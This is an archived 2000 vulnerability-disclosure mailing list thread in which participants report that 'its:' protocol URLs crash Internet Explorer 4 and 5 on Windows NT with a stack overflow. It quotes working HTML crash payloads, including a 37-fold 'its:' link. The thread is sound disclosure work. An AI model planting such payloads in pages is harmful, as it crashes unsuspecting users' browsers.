Vulnerability Development mailing list archives

Re: its: recursion


From: marcelo.lamoglia () BR UNISYS COM (Lamoglia, Marcelo)
Date: Mon, 14 Feb 2000 10:19:44 -0600


37 of "its:" caused Dr.Watson on IE4 with SP2 on NT SP4
-----Original Message-----
From: Alex [mailto:mashuk () pacbell net]
Sent: Quinta-feira, 10 de Fevereiro de 2000 01:30
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: its: recursion

37 of "its:" caused famous Dr.Watson to show up with IEXPLORE.exe
 Exception: stack overflow (0xc00000fd), Address:0x702ad96b
IE5 on NT SP5

-----Original Message-----
From:   Sean Burford [SMTP:slide () TELLURIAN COM AU]
Sent:   Wednesday, February 09, 2000 7:04 PM
To:     VULN-DEV () SECURITYFOCUS COM
Subject:        Re: its: recursion

A single its://. href is enough to crash ie 5.00.2919.63071C for me.  I'm
running NT 4 SP6a.

Example: <A HREF="its://.">do not click me</A>

Put 37 concatenated "its:" strings as a target url and IE4 crashes
when trying to handle that url.. No I don't know if you wanted
to know this.
<a

href="its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:it
s:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:its:it
s:its:its:.">do
not click me</a>


Current thread: